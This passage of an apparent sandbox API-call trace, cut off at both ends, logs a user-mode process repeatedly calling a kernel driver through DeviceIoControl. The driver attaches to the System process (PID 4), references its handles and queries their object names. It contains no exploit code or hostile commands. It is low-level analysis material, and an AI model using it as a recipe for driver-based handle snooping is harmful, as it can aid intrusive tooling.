KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.178] PsReleaseProcessExitSynchronization () returned 0x2 [0240.178] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.178] ObQueryNameString (in: Object=0xfffffa80055f67f0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.178] ObfDereferenceObject (Object=0xfffffa80055f67f0) returned 0x1 [0240.178] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.178] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.178] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0240.178] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.178] PsAcquireProcessExitSynchronization () returned 0x0 [0240.178] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.179] ObReferenceObjectByHandle (in: Handle=0xffffffff8000015c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003884050, HandleInformation=0x0) returned 0x0 [0240.179] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.179] PsReleaseProcessExitSynchronization () returned 0x2 [0240.179] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.179] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.179] ObfDereferenceObject (Object=0xfffffa8003884050) returned 0x1 [0240.179] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.179] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.179] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0240.179] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.179] PsAcquireProcessExitSynchronization () returned 0x0 [0240.179] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.179] ObReferenceObjectByHandle (in: Handle=0xffffffff80000160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ad4dc0, HandleInformation=0x0) returned 0x0 [0240.179] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.179] PsReleaseProcessExitSynchronization () returned 0x2 [0240.179] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.179] ObQueryNameString (in: Object=0xfffffa8002ad4dc0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.179] ObfDereferenceObject (Object=0xfffffa8002ad4dc0) returned 0x1 [0240.180] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.180] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.180] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.180] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.180] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.180] PsAcquireProcessExitSynchronization () returned 0x0 [0240.180] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.180] ObReferenceObjectByHandle (in: Handle=0xffffffff80000170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a28de0, HandleInformation=0x0) returned 0x0 [0240.180] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.180] PsReleaseProcessExitSynchronization () returned 0x2 [0240.180] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.180] ObQueryNameString (in: Object=0xfffffa8003a28de0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.180] ObfDereferenceObject (Object=0xfffffa8003a28de0) returned 0x2 [0240.181] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.181] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.181] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.181] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0240.181] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.181] PsAcquireProcessExitSynchronization () returned 0x0 [0240.181] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.181] ObReferenceObjectByHandle (in: Handle=0xffffffff80000178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ebc970, HandleInformation=0x0) returned 0x0 [0240.181] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.181] PsReleaseProcessExitSynchronization () returned 0x2 [0240.181] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.181] ObQueryNameString (in: Object=0xfffffa8002ebc970, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.181] ObfDereferenceObject (Object=0xfffffa8002ebc970) returned 0x1 [0240.181] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.181] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.181] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.182] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa8, lpOverlapped=0x0) returned 1 [0240.182] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.182] PsAcquireProcessExitSynchronization () returned 0x0 [0240.182] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.182] ObReferenceObjectByHandle (in: Handle=0xffffffff80000180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003404760, HandleInformation=0x0) returned 0x0 [0240.182] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.182] PsReleaseProcessExitSynchronization () returned 0x2 [0240.182] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.182] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.182] ObfDereferenceObject (Object=0xfffffa8003404760) returned 0x21 [0240.182] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.182] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.182] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.182] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0240.182] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.182] PsAcquireProcessExitSynchronization () returned 0x0 [0240.182] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.183] ObReferenceObjectByHandle (in: Handle=0xffffffff80000184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80033ec2c0, HandleInformation=0x0) returned 0x0 [0240.183] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.183] PsReleaseProcessExitSynchronization () returned 0x2 [0240.183] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.183] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.183] ObfDereferenceObject (Object=0xfffffa80033ec2c0) returned 0x1 [0240.183] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.183] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.183] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.183] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0240.183] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.183] PsAcquireProcessExitSynchronization () returned 0x0 [0240.183] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.183] ObReferenceObjectByHandle (in: Handle=0xffffffff8000019c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003429d20, HandleInformation=0x0) returned 0x0 [0240.184] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.184] PsReleaseProcessExitSynchronization () returned 0x2 [0240.184] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.184] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.184] ObfDereferenceObject (Object=0xfffffa8003429d20) returned 0x1 [0240.184] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.184] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.184] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.184] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0240.184] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.184] PsAcquireProcessExitSynchronization () returned 0x0 [0240.184] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.184] ObReferenceObjectByHandle (in: Handle=0xffffffff800001a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003429f20, HandleInformation=0x0) returned 0x0 [0240.184] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.184] PsReleaseProcessExitSynchronization () returned 0x2 [0240.184] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.184] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.184] ObfDereferenceObject (Object=0xfffffa8003429f20) returned 0x1 [0240.184] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.185] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.185] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.185] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0240.185] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.185] PsAcquireProcessExitSynchronization () returned 0x0 [0240.185] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.185] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034469d0, HandleInformation=0x0) returned 0x0 [0240.185] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.185] PsReleaseProcessExitSynchronization () returned 0x2 [0240.185] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.185] ObQueryNameString (in: Object=0xfffffa80034469d0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.185] ObfDereferenceObject (Object=0xfffffa80034469d0) returned 0x3 [0240.185] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.185] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.185] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.186] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0240.186] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.186] PsAcquireProcessExitSynchronization () returned 0x0 [0240.186] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.186] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002cfd840, HandleInformation=0x0) returned 0x0 [0240.186] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.186] PsReleaseProcessExitSynchronization () returned 0x2 [0240.186] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.186] ObQueryNameString (in: Object=0xfffffa8002cfd840, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.186] ObfDereferenceObject (Object=0xfffffa8002cfd840) returned 0x1 [0240.186] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.186] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.186] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.186] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.186] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.186] PsAcquireProcessExitSynchronization () returned 0x0 [0240.186] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.186] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800343f8f0, HandleInformation=0x0) returned 0x0 [0240.187] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.187] PsReleaseProcessExitSynchronization () returned 0x2 [0240.187] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.187] ObQueryNameString (in: Object=0xfffffa800343f8f0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.187] ObfDereferenceObject (Object=0xfffffa800343f8f0) returned 0x1 [0240.187] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.187] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.187] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.187] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.187] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.187] PsAcquireProcessExitSynchronization () returned 0x0 [0240.187] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.187] ObReferenceObjectByHandle (in: Handle=0xffffffff800001bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003435830, HandleInformation=0x0) returned 0x0 [0240.187] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.188] PsReleaseProcessExitSynchronization () returned 0x2 [0240.188] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.188] ObQueryNameString (in: Object=0xfffffa8003435830, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.188] ObfDereferenceObject (Object=0xfffffa8003435830) returned 0x1 [0240.188] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.188] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.188] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.188] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0240.188] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.188] PsAcquireProcessExitSynchronization () returned 0x0 [0240.188] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.188] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ec5560, HandleInformation=0x0) returned 0x0 [0240.188] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.188] PsReleaseProcessExitSynchronization () returned 0x2 [0240.188] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.188] ObQueryNameString (in: Object=0xfffffa8002ec5560, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.189] ObfDereferenceObject (Object=0xfffffa8002ec5560) returned 0x1 [0240.189] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.189] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.189] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0240.189] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.189] PsAcquireProcessExitSynchronization () returned 0x0 [0240.189] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.189] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa801152f050, HandleInformation=0x0) returned 0x0 [0240.189] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.189] PsReleaseProcessExitSynchronization () returned 0x2 [0240.189] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.189] ObQueryNameString (in: Object=0xfffffa801152f050, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.189] ObfDereferenceObject (Object=0xfffffa801152f050) returned 0x1 [0240.189] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.189] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.189] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0240.189] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.189] PsAcquireProcessExitSynchronization () returned 0x0 [0240.190] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.190] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8011951f20, HandleInformation=0x0) returned 0x0 [0240.190] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.190] PsReleaseProcessExitSynchronization () returned 0x2 [0240.190] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.190] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: 